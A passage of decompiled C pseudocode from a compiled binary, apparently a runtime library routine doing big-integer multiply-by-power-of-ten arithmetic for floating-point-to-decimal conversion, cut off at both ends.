                                                                          												if( *((intOrPtr*)(_t1234 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1234 + _t1086 - 0x1d0))) {
                                                                          													goto L53;
                                                                          												}
                                                                          												_t1086 = _t1086 + 4;
                                                                          												__eflags = _t1086 - 8;
                                                                          												if(_t1086 != 8) {
                                                                          													continue;
                                                                          												} else {
                                                                          													_t985 = _v1872 + 2;
                                                                          													_t986 = _t985 & 0x0000001f;
                                                                          													_t1087 = 0x20;
                                                                          													_t1088 = _t1087 - _t986;
                                                                          													_v1888 = _t986;
                                                                          													_t1230 = _t985 >> 5;
                                                                          													_v1876 = _t1230;
                                                                          													_v1908 = _t1088;
                                                                          													_t989 = E00059E20(1, _t1088, 0);
                                                                          													_v1896 = _v1896 & 0x00000000;
                                                                          													_t990 = _t989 - 1;
                                                                          													__eflags = _t990;
                                                                          													asm("bsr ecx, edi");
                                                                          													_v1884 = _t990;
                                                                          													_v1912 =  !_t990;
                                                                          													if(_t990 == 0) {
                                                                          														_t1089 = 0;
                                                                          														__eflags = 0;
                                                                          													} else {
                                                                          														_t1089 = _t1088 + 1;
                                                                          													}
                                                                          													_t992 = 0x20;
                                                                          													_t993 = _t992 - _t1089;
                                                                          													_t1141 = _t1230 + 2;
                                                                          													__eflags = _v1888 - _t993;
                                                                          													_v1880 = _t1141;
                                                                          													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
                                                                          													__eflags = _t1141 - 0x73;
                                                                          													_v1865 = _t994;
                                                                          													_t1090 = _t1089 & 0xffffff00 | _t1141 - 0x00000073 > 0x00000000;
                                                                          													__eflags = _t1141 - 0x73;
                                                                          													if(_t1141 != 0x73) {
                                                                          														L28:
                                                                          														_t995 = 0;
                                                                          														__eflags = 0;
                                                                          													} else {
                                                                          														__eflags = _t994;
                                                                          														if(_t994 == 0) {
                                                                          															goto L28;
                                                                          														} else {
                                                                          															_t995 = 1;
                                                                          														}
                                                                          													}
                                                                          													__eflags = _t1090;
                                                                          													if(_t1090 != 0) {
                                                                          														L50:
                                                                          														__eflags = 0;
                                                                          														_t1025 = 0x1cc;
                                                                          														_push(0);
                                                                          														_v1400 = 0;
                                                                          														_v472 = 0;
                                                                          														_push( &_v1396);
                                                                          														_push(0x1cc);
                                                                          														_push( &_v468);
                                                                          														L313();
                                                                          														_t1236 =  &(_t1236[4]);
                                                                          													} else {
                                                                          														__eflags = _t995;
                                                                          														if(_t995 != 0) {
                                                                          															goto L50;
                                                                          														} else {
                                                                          															_t1093 = 0x72;
                                                                          															__eflags = _t1141 - _t1093;
                                                                          															if(_t1141 >= _t1093) {
                                                                          																_t1141 = _t1093;
                                                                          																_v1880 = _t1093;
                                                                          															}
                                                                          															_t1094 = _t1141;
                                                                          															_v1892 = _t1094;
                                                                          															__eflags = _t1141 - 0xffffffff;
                                                                          															if(_t1141 != 0xffffffff) {
                                                                          																_t1142 = _v1876;
                                                                          																_t1232 = _t1141 - _t1142;
                                                                          																__eflags = _t1232;
                                                                          																_t1004 =  &_v468 + _t1232 * 4;
                                                                          																_v1872 = _t1004;
                                                                          																while(1) {
                                                                          																	__eflags = _t1094 - _t1142;
                                                                          																	if(_t1094 < _t1142) {
                                                                          																		break;
                                                                          																	}
                                                                          																	__eflags = _t1232 - _t1022;
                                                                          																	if(_t1232 >= _t1022) {
                                                                          																		_t1191 = 0;
                                                                          																		__eflags = 0;
                                                                          																	} else {
                                                                          																		_t1191 =  *_t1004;
                                                                          																	}
                                                                          																	__eflags = _t1232 - 1 - _t1022;
                                                                          																	if(_t1232 - 1 >= _t1022) {
                                                                          																		_t1006 = 0;
                                                                          																		__eflags = 0;
                                                                          																	} else {
                                                                          																		_t1006 =  *(_v1872 - 4);
                                                                          																	}
                                                                          																	_t1099 = _v1892;
                                                                          																	 *(_t1234 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1191 & _v1884) << _v1888;
                                                                          																	_t1094 = _t1099 - 1;
                                                                          																	_t1232 = _t1232 - 1;
                                                                          																	_t1004 = _v1872 - 4;
                                                                          																	_v1892 = _t1094;
                                                                          																	_v1872 = _t1004;
                                                                          																	__eflags = _t1094 - 0xffffffff;
                                                                          																	if(_t1094 != 0xffffffff) {
                                                                          																		_t1022 = _v472;
                                                                          																		continue;
                                                                          																	}
                                                                          																	break;
                                                                          																}
                                                                          																_t1141 = _v1880;
                                                                          																_t1230 = _v1876;
                                                                          															}
                                                                          															__eflags = _t1230;
                                                                          															if(_t1230 != 0) {
                                                                          																__eflags = 0;
                                                                          																memset( &_v468, 0, _t1230 << 2);
                                                                          																_t1236 =  &(_t1236[3]);
                                                                          															}
                                                                          															__eflags = _v1865;
                                                                          															_t1025 = 0x1cc;
                                                                          															if(_v1865 == 0) {
                                                                          																_v472 = _t1141;
                                                                          															} else {
                                                                          																_v472 = _t1141 + 1;
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          													_v1392 = _v1392 & 0x00000000;
                                                                          													_t999 = 4;
                                                                          													__eflags = 1;
                                                                          													_v1396 = _t999;
                                                                          													_v1400 = 1;
                                                                          													_v936 = 1;
                                                                          													_push(_t999);
                                                                          												}
                                                                          												goto L52;
                                                                          											}
                                                                          											goto L53;
                                                                          										}
                                                                          										L52:
                                                                          										_push( &_v1396);
                                                                          										_push(_t1025);
                                                                          										_push( &_v932);
                                                                          										L313();
                                                                          										_t1240 =  &(_t1236[4]);
                                                                          									}
                                                                          									_t782 = _v1904;
                                                                          									_t1043 = 0xa;
                                                                          									_v1912 = _t1043;
                                                                          									__eflags = _t782;
                                                                          									if(_t782 < 0) {
                                                                          										_t783 =  ~_t782;
                                                                          										_t784 = _t783 / _t1043;
                                                                          										_v1880 = _t784;
                                                                          										_t1044 = _t783 % _t1043;
                                                                          										_v1884 = _t1044;
                                                                          										__eflags = _t784;
                                                                          										if(_t784 == 0) {
                                                                          											L249:
                                                                          											__eflags = _t1044;
                                                                          											if(_t1044 != 0) {
                                                                          												_t820 =  *(0x73414 + _t1044 * 4);
                                                                          												_v1896 = _t820;
                                                                          												__eflags = _t820;
                                                                          												if(_t820 == 0) {
                                                                          													L260:
                                                                          													__eflags = 0;
                                                                          													_push(0);
                                                                          													_v472 = 0;
                                                                          													_v2408 = 0;
                                                                          													goto L261;
                                                                          												} else {
                                                                          													__eflags = _t820 - 1;
                                                                          													if(_t820 != 1) {
                                                                          														_t1055 = _v472;
                                                                          														__eflags = _t1055;
                                                                          														if(_t1055 != 0) {
                                                                          															_t1160 = 0;
                                                                          															_t1212 = 0;
                                                                          															__eflags = 0;
                                                                          															do {
                                                                          																_t1112 = _t820 *  *(_t1234 + _t1212 * 4 - 0x1d0) >> 0x20;
                                                                          																 *(_t1234 + _t1212 * 4 - 0x1d0) = _t820 *  *(_t1234 + _t1212 * 4 - 0x1d0) + _t1160;
                                                                          																_t820 = _v1896;
                                                                          																asm("adc edx, 0x0");
                                                                          																_t1212 = _t1212 + 1;
                                                                          																_t1160 = _t1112;
                                                                          																__eflags = _t1212 - _t1055;
                                                                          															} while (_t1212 != _t1055);
                                                                          															__eflags = _t1160;
                                                                          															if(_t1160 != 0) {
                                                                          																_t826 = _v472;
                                                                          																__eflags = _t826 - 0x73;
                                                                          																if(_t826 >= 0x73) {
                                                                          																	goto L260;
                                                                          																} else {
                                                                          																	 *(_t1234 + _t826 * 4 - 0x1d0) = _t1160;
                                                                          																	_v472 = _v472 + 1;
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											do {
                                                                          												__eflags = _t784 - 0x26;
                                                                          												if(_t784 > 0x26) {
                                                                          													_t784 = 0x26;
                                                                          												}
                                                                          												_t1056 =  *(0x7337e + _t784 * 4) & 0x000000ff;
                                                                          												_v1872 = _t784;
                                                                          												_v1400 = ( *(0x7337e + _t784 * 4) & 0x000000ff) + ( *(0x7337f + _t784 * 4) & 0x000000ff);
                                                                          												E0003F670(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
                                                                          												_t837 = E0003F0F0( &(( &_v1396)[_t1056]), 0x72a78 + ( *(0x7337c + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x7337f + _t784 * 4) & 0x000000ff) << 2);
                                                                          												_t1057 = _v1400;
                                                                          												_t1240 =  &(_t1240[6]);
                                                                          												_v1892 = _t1057;
                                                                          												__eflags = _t1057 - 1;
                                                                          												if(_t1057 > 1) {
                                                                          													__eflags = _v472 - 1;
                                                                          													if(_v472 > 1) {
                                                                          														__eflags = _t1057 - _v472;
                                                                          														_t1163 =  &_v1396;
                                                                          														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
                                                                          														__eflags = _t838;
                                                                          														if(_t838 != 0) {
                                                                          															_t1113 =  &_v468;
                                                                          														} else {
                                                                          															_t1163 =  &_v468;
                                                                          															_t1113 =  &_v1396;
                                                                          														}
                                                                          														_v1908 = _t1113;
                                                                          														__eflags = _t838;
                                                                          														if(_t838 == 0) {
                                                                          															_t1057 = _v472;
                                                                          														}
                                                                          														_v1876 = _t1057;
                                                                          														__eflags = _t838;
                                                                          														if(_t838 != 0) {
                                                                          															_v1892 = _v472;
                                                                          														}
                                                                          														_t1114 = 0;
                                                                          														_t1214 = 0;
                                                                          														_v1864 = 0;
                                                                          														__eflags = _t1057;
                                                                          														if(_t1057 == 0) {
                                                                          															L243:
                                                                          															_v472 = _t1114;
                                                                          															_t840 = _t1114 << 2;
                                                                          															__eflags = _t840;
                                                                          															_push(_t840);
                                                                          															_t841 =  &_v1860;
                                                                          															goto L244;
                                                                          														} else {
                                                                          															_t1164 = _t1163 -  &_v1860;
                                                                          															__eflags = _t1164;
                                                                          															_v1928 = _t1164;
                                                                          															do {
                                                                          																_t847 =  *(_t1234 + _t1164 + _t1214 * 4 - 0x740);
                                                                          																_v1896 = _t847;
                                                                          																__eflags = _t847;
                                                                          																if(_t847 != 0) {
                                                                          																	_t848 = 0;
                                                                          																	_t1165 = 0;
                                                                          																	_t1058 = _t1214;
                                                                          																	_v1888 = 0;
                                                                          																	__eflags = _v1892;
                                                                          																	if(_v1892 == 0) {
                                                                          																		L240:
                                                                          																		__eflags = _t1058 - 0x73;
                                                                          																		if(_t1058 == 0x73) {
                                                                          																			goto L258;
                                                                          																		} else {
                                                                          																			_t1164 = _v1928;
                                                                          																			_t1057 = _v1876;
                                                                          																			goto L242;
                                                                          																		}
                                                                          																	} else {
                                                                          																		while(1) {
                                                                          																			__eflags = _t1058 - 0x73;
                                                                          																			if(_t1058 == 0x73) {
                                                                          																				goto L235;
                                                                          																			}
                                                                          																			__eflags = _t1058 - _t1114;
                                                                          																			if(_t1058 == _t1114) {
                                                                          																				 *(_t1234 + _t1058 * 4 - 0x740) =  *(_t1234 + _t1058 * 4 - 0x740) & 0x00000000;
                                                                          																				_t859 = _t848 + 1 + _t1214;
                                                                          																				__eflags = _t859;
                                                                          																				_v1864 = _t859;
                                                                          																				_t848 = _v1888;
                                                                          																			}
                                                                          																			_t854 =  *(_v1908 + _t848 * 4);
                                                                          																			asm("adc edx, 0x0");
                                                                          																			 *(_t1234 + _t1058 * 4 - 0x740) =  *(_t1234 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1165;
                                                                          																			asm("adc edx, 0x0");
                                                                          																			_t848 = _v1888 + 1;
                                                                          																			_t1058 = _t1058 + 1;
                                                                          																			_v1888 = _t848;
                                                                          																			_t1165 = _t854 * _v1896 >> 0x20;
                                                                          																			_t1114 = _v1864;
                                                                          																			__eflags = _t848 - _v1892;
                                                                          																			if(_t848 != _v1892) {
                                                                          																				continue;
                                                                          																			} else {
                                                                          																				goto L235;
                                                                          																			}
                                                                          																			while(1) {
                                                                          																				L235:
                                                                          																				__eflags = _t1165;
                                                                          																				if(_t1165 == 0) {
                                                                          																					goto L240;
                                                                          																				}
                                                                          																				__eflags = _t1058 - 0x73;
                                                                          																				if(_t1058 == 0x73) {
                                                                          																					goto L258;
                                                                          																				} else {
                                                                          																					__eflags = _t1058 - _t1114;
                                                                          																					if(_t1058 == _t1114) {
                                                                          																						_t558 = _t1234 + _t1058 * 4 - 0x740;
                                                                          																						 *_t558 =  *(_t1234 + _t1058 * 4 - 0x740) & 0x00000000;
                                                                          																						__eflags =  *_t558;
                                                                          																						_t564 = _t1058 + 1; // 0x1
                                                                          																						_v1864 = _t564;
                                                                          																					}
                                                                          																					_t852 = _t1165;
                                                                          																					_t1165 = 0;
                                                                          																					 *(_t1234 + _t1058 * 4 - 0x740) =  *(_t1234 + _t1058 * 4 - 0x740) + _t852;
                                                                          																					_t1114 = _v1864;
                                                                          																					asm("adc edi, edi");
                                                                          																					_t1058 = _t1058 + 1;
                                                                          																					continue;
                                                                          																				}
                                                                          																				goto L246;
                                                                          																			}
                                                                          																			goto L240;
                                                                          																		}
                                                                          																		goto L235;
                                                                          																	}
                                                                          																} else {
                                                                          																	__eflags = _t1214 - _t1114;
                                                                          																	if(_t1214 == _t1114) {
                                                                          																		 *(_t1234 + _t1214 * 4 - 0x740) =  *(_t1234 + _t1214 * 4 - 0x740) & _t847;
                                                                          																		_t526 = _t1214 + 1; // 0x1
                                                                          																		_t1114 = _t526;
                                                                          																		_v1864 = _t1114;
                                                                          																	}
                                                                          																	goto L242;
                                                                          																}
                                                                          																goto L246;
                                                                          																L242:
                                                                          																_t1214 = _t1214 + 1;
                                                                          																__eflags = _t1214 - _t1057;
                                                                          															} while (_t1214 != _t1057);
                                                                          															goto L243;
                                                                          														}
                                                                          													} else {
                                                                          														_t1166 = _v468;
                                                                          														_push(_t1057 << 2);
                                                                          														_v472 = _t1057;
                                                                          														_push( &_v1396);
                                                                          														_push(_t1025);
                                                                          														_push( &_v468);
                                                                          														L313();
                                                                          														_t1240 =  &(_t1240[4]);
                                                                          														__eflags = _t1166;
                                                                          														if(_t1166 == 0) {
                                                                          															goto L203;
                                                                          														} else {
                                                                          															__eflags = _t1166 - 1;
                                                                          															if(_t1166 == 1) {
                                                                          																goto L245;
                                                                          															} else {
                                                                          																__eflags = _v472;
                                                                          																if(_v472 == 0) {
                                                                          																	goto L245;
                                                                          																} else {
                                                                          																	_t1059 = 0;
                                                                          																	_v1896 = _v472;
                                                                          																	_t1215 = 0;
                                                                          																	__eflags = 0;
                                                                          																	do {
                                                                          																		_t867 = _t1166;
                                                                          																		_t1115 = _t867 *  *(_t1234 + _t1215 * 4 - 0x1d0) >> 0x20;
                                                                          																		 *(_t1234 + _t1215 * 4 - 0x1d0) = _t867 *  *(_t1234 + _t1215 * 4 - 0x1d0) + _t1059;
                                                                          																		asm("adc edx, 0x0");
                                                                          																		_t1215 = _t1215 + 1;
                                                                          																		_t1059 = _t1115;
                                                                          																		__eflags = _t1215 - _v1896;
                                                                          																	} while (_t1215 != _v1896);
                                                                          																	goto L208;
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												} else {
                                                                          													_t1167 = _v1396;
                                                                          													__eflags = _t1167;
                                                                          													if(_t1167 != 0) {
                                                                          														__eflags = _t1167 - 1;
                                                                          														if(_t1167 == 1) {
                                                                          															goto L245;
                                                                          														} else {
                                                                          															__eflags = _v472;
                                                                          															if(_v472 == 0) {
                                                                          																goto L245;
                                                                          															} else {
                                                                          																_t1060 = 0;
                                                                          																_v1896 = _v472;
                                                                          																_t1216 = 0;
                                                                          																__eflags = 0;
                                                                          																do {
                                                                          																	_t872 = _t1167;
                                                                          																	_t1116 = _t872 *  *(_t1234 + _t1216 * 4 - 0x1d0) >> 0x20;
                                                                          																	 *(_t1234 + _t1216 * 4 - 0x1d0) = _t872 *  *(_t1234 + _t1216 * 4 - 0x1d0) + _t1060;
                                                                          																	asm("adc edx, 0x0");
                                                                          																	_t1216 = _t1216 + 1;
                                                                          																	_t1060 = _t1116;
                                                                          																	__eflags = _t1216 - _v1896;
                                                                          																} while (_t1216 != _v1896);
                                                                          																L208:
                                                                          																__eflags = _t1059;
                                                                          																if(_t1059 == 0) {
                                                                          																	goto L245;
                                                                          																} else {
                                                                          																	_t870 = _v472;
                                                                          																	__eflags = _t870 - 0x73;
                                                                          																	if(_t870 >= 0x73) {
                                                                          																		L258:
                                                                          																		_push(0);
                                                                          																		_v2408 = 0;
                                                                          																		_v472 = 0;
                                                                          																		_push( &_v2404);
                                                                          																		_push(_t1025);
                                                                          																		_push( &_v468);
                                                                          																		L313();
                                                                          																		_t1240 =  &(_t1240[4]);
                                                                          																		_t843 = 0;
                                                                          																	} else {
                                                                          																		 *(_t1234 + _t870 * 4 - 0x1d0) = _t1059;
                                                                          																		_v472 = _v472 + 1;
                                                                          																		goto L245;
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													} else {
                                                                          														L203:
                                                                          														_v2408 = 0;
                                                                          														_v472 = 0;
                                                                          														_push(0);
                                                                          														_t841 =  &_v2404;
                                                                          														L244:
                                                                          														_push(_t841);
                                                                          														_push(_t1025);
                                                                          														_push( &_v468);
                                                                          														L313();
                                                                          														_t1240 =  &(_t1240[4]);
                                                                          														L245:
                                                                          														_t843 = 1;
                                                                          													}
                                                                          												}
                                                                          												L246:
                                                                          												__eflags = _t843;
                                                                          												if(_t843 == 0) {
                                                                          													_v2408 = _v2408 & 0x00000000;
                                                                          													_v472 = _v472 & 0x00000000;
                                                                          													_push(0);
                                                                          													L261:
                                                                          													_push( &_v2404);
                                                                          													_t823 =  &_v468;
                                                                          													goto L262;
                                                                          												} else {
                                                                          													goto L247;
                                                                          												}
                                                                          												goto L263;
                                                                          												L247:
                                                                          												_t784 = _v1880 - _v1872;
                                                                          												__eflags = _t784;
                                                                          												_v1880 = _t784;
                                                                          											} while (_t784 != 0);
                                                                          											_t1044 = _v1884;
                                                                          											goto L249;
                                                                          										}
                                                                          									} else {
                                                                          										_t875 = _t782 / _t1043;
                                                                          										_v1908 = _t875;
                                                                          										_t1061 = _t782 % _t1043;
                                                                          										_v1896 = _t1061;
                                                                          										__eflags = _t875;
                                                                          										if(_t875 == 0) {
                                                                          											L184:
                                                                          											__eflags = _t1061;
                                                                          											if(_t1061 != 0) {
                                                                          												_t1168 =  *(0x73414 + _t1061 * 4);
                                                                          												__eflags = _t1168;
                                                                          												if(_t1168 != 0) {
                                                                          													__eflags = _t1168 - 1;
                                                                          													if(_t1168 != 1) {
                                                                          														_t876 = _v936;
                                                                          														_v1896 = _t876;
                                                                          														__eflags = _t876;
                                                                          														if(_t876 != 0) {
                                                                          															_t1217 = 0;
                                                                          															_t1062 = 0;
                                                                          															__eflags = 0;
                                                                          															do {
                                                                          																_t877 = _t1168;
                                                                          																_t1120 = _t877 *  *(_t1234 + _t1062 * 4 - 0x3a0) >> 0x20;
                                                                          																 *(_t1234 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1234 + _t1062 * 4 - 0x3a0) + _t1217;
                                                                          																asm("adc edx, 0x0");
                                                                          																_t1062 = _t1062 + 1;
                                                                          																_t1217 = _t1120;
                                                                          																__eflags = _t1062 - _v1896;
                                                                          															} while (_t1062 != _v1896);
                                                                          															__eflags = _t1217;
                                                                          															if(_t1217 != 0) {
                                                                          																_t880 = _v936;
                                                                          																__eflags = _t880 - 0x73;
                                                                          																if(_t880 >= 0x73) {
                                                                          																	goto L186;
                                                                          																} else {
                                                                          																	 *(_t1234 + _t880 * 4 - 0x3a0) = _t1217;
                                                                          																	_v936 = _v936 + 1;
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												} else {
                                                                          													L186:
                                                                          													_v2408 = 0;
                                                                          													_v936 = 0;
                                                                          													_push(0);
                                                                          													goto L190;
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											do {
                                                                          												__eflags = _t875 - 0x26;
                                                                          												if(_t875 > 0x26) {
                                                                          													_t875 = 0x26;
                                                                          												}
                                                                          												_t1063 =  *(0x7337e + _t875 * 4) & 0x000000ff;
                                                                          												_v1888 = _t875;
                                                                          												_v1400 = ( *(0x7337e + _t875 * 4) & 0x000000ff) + ( *(0x7337f + _t875 * 4) & 0x000000ff);
                                                                          												E0003F670(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
                                                                          												_t893 = E0003F0F0( &(( &_v1396)[_t1063]), 0x72a78 + ( *(0x7337c + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x7337f + _t875 * 4) & 0x000000ff) << 2);
                                                                          												_t1064 = _v1400;
                                                                          												_t1240 =  &(_t1240[6]);
                                                                          												_v1892 = _t1064;
                                                                          												__eflags = _t1064 - 1;
                                                                          												if(_t1064 > 1) {
                                                                          													__eflags = _v936 - 1;
                                                                          													if(_v936 > 1) {
                                                                          														__eflags = _t1064 - _v936;
                                                                          														_t1171 =  &_v1396;
                                                                          														_t894 = _t893 & 0xffffff00 | _t1064 - _v936 > 0x00000000;
                                                                          														__eflags = _t894;
                                                                          														if(_t894 != 0) {
                                                                          															_t1121 =  &_v932;
                                                                          														} else {
                                                                          															_t1171 =  &_v932;
                                                                          															_t1121 =  &_v1396;
                                                                          														}
                                                                          														_v1876 = _t1121;
                                                                          														__eflags = _t894;
                                                                          														if(_t894 == 0) {
                                                                          															_t1064 = _v936;
                                                                          														}
                                                                          														_v1880 = _t1064;
                                                                          														__eflags = _t894;
                                                                          														if(_t894 != 0) {
                                                                          															_v1892 = _v936;
                                                                          														}
                                                                          														_t1122 = 0;
                                                                          														_t1219 = 0;
                                                                          														_v1864 = 0;
                                                                          														__eflags = _t1064;
                                                                          														if(_t1064 == 0) {
                                                                          															L177:
                                                                          															_v936 = _t1122;
                                                                          															_t896 = _t1122 << 2;
                                                                          															__eflags = _t896;
                                                                          															goto L178;
                                                                          														} else {
                                                                          															_t1172 = _t1171 -  &_v1860;
                                                                          															__eflags = _t1172;
                                                                          															_v1928 = _t1172;
                                                                          															do {
                                                                          																_t903 =  *(_t1234 + _t1172 + _t1219 * 4 - 0x740);
                                                                          																_v1884 = _t903;
                                                                          																__eflags = _t903;
                                                                          																if(_t903 != 0) {
                                                                          																	_t904 = 0;
                                                                          																	_t1173 = 0;
                                                                          																	_t1065 = _t1219;
                                                                          																	_v1872 = 0;
                                                                          																	__eflags = _v1892;
                                                                          																	if(_v1892 == 0) {
                                                                          																		L174:
                                                                          																		__eflags = _t1065 - 0x73;
                                                                          																		if(_t1065 == 0x73) {
                                                                          																			goto L187;
                                                                          																		} else {
                                                                          																			_t1172 = _v1928;
                                                                          																			_t1064 = _v1880;
                                                                          																			goto L176;
                                                                          																		}
                                                                          																	} else {
                                                                          																		while(1) {
                                                                          																			__eflags = _t1065 - 0x73;
                                                                          																			if(_t1065 == 0x73) {
                                                                          																				goto L169;
                                                                          																			}
                                                                          																			__eflags = _t1065 - _t1122;
                                                                          																			if(_t1065 == _t1122) {
                                                                          																				 *(_t1234 + _t1065 * 4 - 0x740) =  *(_t1234 + _t1065 * 4 - 0x740) & 0x00000000;
                                                                          																				_t915 = _t904 + 1 + _t1219;
                                                                          																				__eflags = _t915;
                                                                          																				_v1864 = _t915;
                                                                          																				_t904 = _v1872;
                                                                          																			}
                                                                          																			_t910 =  *(_v1876 + _t904 * 4);
                                                                          																			asm("adc edx, 0x0");
                                                                          																			 *(_t1234 + _t1065 * 4 - 0x740) =  *(_t1234 + _t1065 * 4 - 0x740) + _t910 * _v1884 + _t1173;
                                                                          																			asm("adc edx, 0x0");
                                                                          																			_t904 = _v1872 + 1;
                                                                          																			_t1065 = _t1065 + 1;
                                                                          																			_v1872 = _t904;
                                                                          																			_t1173 = _t910 * _v1884 >> 0x20;
                                                                          																			_t1122 = _v1864;
                                                                          																			__eflags = _t904 - _v1892;
                                                                          																			if(_t904 != _v1892) {
                                                                          																				continue;
                                                                          																			} else {
                                                                          																				goto L169;
                                                                          																			}
                                                                          																			while(1) {
                                                                          																				L169:
                                                                          																				__eflags = _t1173;
                                                                          																				if(_t1173 == 0) {
                                                                          																					goto L174;
                                                                          																				}
                                                                          																				__eflags = _t1065 - 0x73;
                                                                          																				if(_t1065 == 0x73) {
                                                                          																					L187:
                                                                          																					__eflags = 0;
                                                                          																					_v2408 = 0;
                                                                          																					_v936 = 0;
                                                                          																					_push(0);
                                                                          																					_t906 =  &_v2404;
                                                                          																					goto L188;
                                                                          																				} else {
                                                                          																					__eflags = _t1065 - _t1122;
                                                                          																					if(_t1065 == _t1122) {
                                                                          																						_t370 = _t1234 + _t1065 * 4 - 0x740;
                                                                          																						 *_t370 =  *(_t1234 + _t1065 * 4 - 0x740) & 0x00000000;
                                                                          																						__eflags =  *_t370;
                                                                          																						_t376 = _t1065 + 1; // 0x1
                                                                          																						_v1864 = _t376;
                                                                          																					}
                                                                          																					_t908 = _t1173;
                                                                          																					_t1173 = 0;
                                                                          																					 *(_t1234 + _t1065 * 4 - 0x740) =  *(_t1234 + _t1065 * 4 - 0x740) + _t908;
                                                                          																					_t1122 = _v1864;
                                                                          																					asm("adc edi, edi");
                                                                          																					_t1065 = _t1065 + 1;
                                                                          																					continue;
                                                                          																				}
                                                                          																				goto L181;
                                                                          																			}
                                                                          																			goto L174;
                                                                          																		}
                                                                          																		goto L169;
                                                                          																	}
                                                                          																} else {
                                                                          																	__eflags = _t1219 - _t1122;
                                                                          																	if(_t1219 == _t1122) {
                                                                          																		 *(_t1234 + _t1219 * 4 - 0x740) =  *(_t1234 + _t1219 * 4 - 0x740) & _t903;
                                                                          																		_t338 = _t1219 + 1; // 0x1
                                                                          																		_t1122 = _t338;
                                                                          																		_v1864 = _t1122;
                                                                          																	}
                                                                          																	goto L176;
                                                                          																}
                                                                          																goto L181;
                                                                          																L176:
                                                                          																_t1219 = _t1219 + 1;
                                                                          																__eflags = _t1219 - _t1064;
                                                                          															} while (_t1219 != _t1064);
                                                                          															goto L177;
                                                                          														}
                                                                          													} else {
                                                                          														_t1174 = _v932;
                                                                          														_push(_t1064 << 2);
                                                                          														_v936 = _t1064;
                                                                          														_push( &_v1396);
                                                                          														_push(_t1025);
                                                                          														_push( &_v932);
                                                                          														L313();
                                                                          														_t1240 =  &(_t1240[4]);
                                                                          														__eflags = _t1174;
                                                                          														if(_t1174 != 0) {
                                                                          															__eflags = _t1174 - 1;
                                                                          															if(_t1174 == 1) {
                                                                          																goto L180;
                                                                          															} else {
                                                                          																__eflags = _v936;
                                                                          																if(_v936 == 0) {
                                                                          																	goto L180;
                                                                          																} else {
                                                                          																	_t1066 = 0;
                                                                          																	_v1884 = _v936;
                                                                          																	_t1220 = 0;
                                                                          																	__eflags = 0;
                                                                          																	do {
                                                                          																		_t922 = _t1174;
                                                                          																		_t1123 = _t922 *  *(_t1234 + _t1220 * 4 - 0x3a0) >> 0x20;
                                                                          																		 *(_t1234 + _t1220 * 4 - 0x3a0) = _t922 *  *(_t1234 + _t1220 * 4 - 0x3a0) + _t1066;
                                                                          																		asm("adc edx, 0x0");
                                                                          																		_t1220 = _t1220 + 1;
                                                                          																		_t1066 = _t1123;
                                                                          																		__eflags = _t1220 - _v1884;
                                                                          																	} while (_t1220 != _v1884);
                                                                          																	goto L149;
                                                                          																}
                                                                          															}
                                                                          														} else {
                                                                          															_v1400 = 0;
                                                                          															_v936 = 0;
                                                                          															_push(0);
                                                                          															_t897 =  &_v1396;
                                                                          															goto L179;
                                                                          														}
                                                                          													}
                                                                          												} else {
                                                                          													_t1175 = _v1396;
                                                                          													__eflags = _t1175;
                                                                          													if(_t1175 != 0) {
                                                                          														__eflags = _t1175 - 1;
                                                                          														if(_t1175 == 1) {
                                                                          															goto L180;
                                                                          														} else {
                                                                          															__eflags = _v936;
                                                                          															if(_v936 == 0) {
                                                                          																goto L180;
                                                                          															} else {
                                                                          																_t1067 = 0;
                                                                          																_v1884 = _v936;
                                                                          																_t1221 = 0;
                                                                          																__eflags = 0;
                                                                          																do {
                                                                          																	_t929 = _t1175;
                                                                          																	_t1124 = _t929 *  *(_t1234 + _t1221 * 4 - 0x3a0) >> 0x20;
                                                                          																	 *(_t1234 + _t1221 * 4 - 0x3a0) = _t929 *  *(_t1234 + _t1221 * 4 - 0x3a0) + _t1067;
                                                                          																	asm("adc edx, 0x0");
                                                                          																	_t1221 = _t1221 + 1;
                                                                          																	_t1067 = _t1124;
                                                                          																	__eflags = _t1221 - _v1884;
                                                                          																} while (_t1221 != _v1884);
                                                                          																L149:
                                                                          																__eflags = _t1066;
                                                                          																if(_t1066 == 0) {
                                                                          																	goto L180;
                                                                          																} else {
                                                                          																	_t925 = _v936;
                                                                          																	__eflags = _t925 - 0x73;
                                                                          																	if(_t925 < 0x73) {
                                                                          																		 *(_t1234 + _t925 * 4 - 0x3a0) = _t1066;
                                                                          																		_v936 = _v936 + 1;
                                                                          																		goto L180;
                                                                          																	} else {
                                                                          																		_v1400 = 0;
                                                                          																		_v936 = 0;
                                                                          																		_push(0);
                                                                          																		_t906 =  &_v1396;
                                                                          																		L188:
                                                                          																		_push(_t906);
                                                                          																		_push(_t1025);
                                                                          																		_push( &_v932);
                                                                          																		L313();
                                                                          																		_t1240 =  &(_t1240[4]);
                                                                          																		_t899 = 0;
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													} else {
                                                                          														_t896 = 0;
                                                                          														_v1864 = 0;
                                                                          														_v936 = 0;
                                                                          														L178:
                                                                          														_push(_t896);
                                                                          														_t897 =  &_v1860;
                                                                          														L179:
                                                                          														_push(_t897);
                                                                          														_push(_t1025);
                                                                          														_push( &_v932);
                                                                          														L313();
                                                                          														_t1240 =  &(_t1240[4]);
                                                                          														L180:
                                                                          														_t899 = 1;
                                                                          													}
                                                                          												}
                                                                          												L181:
                                                                          												__eflags = _t899;
                                                                          												if(_t899 == 0) {
                                                                          													_v2408 = _v2408 & 0x00000000;
                                                                          													_t404 =  &_v936;
